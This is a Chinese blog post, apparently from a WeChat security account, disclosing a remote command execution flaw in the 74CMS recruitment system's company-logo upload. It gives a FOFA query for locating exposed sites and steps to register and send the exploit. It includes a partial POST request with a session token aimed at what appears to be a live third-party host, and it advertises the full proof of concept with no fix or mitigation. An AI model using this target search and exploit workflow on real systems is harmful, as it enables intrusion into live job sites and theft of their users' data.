骑士cms系统完美和庞大的用户,也存在致命漏洞,这也彰显了没有绝对的网络的安全。
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。
漏洞描述
74CMS人才系统存在命令执行漏洞,漏洞地址存在与sendCompanyLogo文件中/controller/company/Index.php#sendCompanyLogo的组件Company Logo Handler。经修改后的参数:imgBase64恶意代码输入可导致rce。
漏洞复现
「FOFA」
app="骑士-74CMS"
注册为公司用户
/member/reg/company
注册完成后打入pocPOST /v1_0/company/index/sendCompanyLogo HTTP/2Host: zp.myooun.comCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36User-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsIdVde32dI6MTc12ddETAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTYEOCJSfQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-打入poc后直接访问
项目获取
公众号:「吉吉说安全」,对我发消息【20240325】免费获取poc
抓紧保存收藏,随时会下架
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
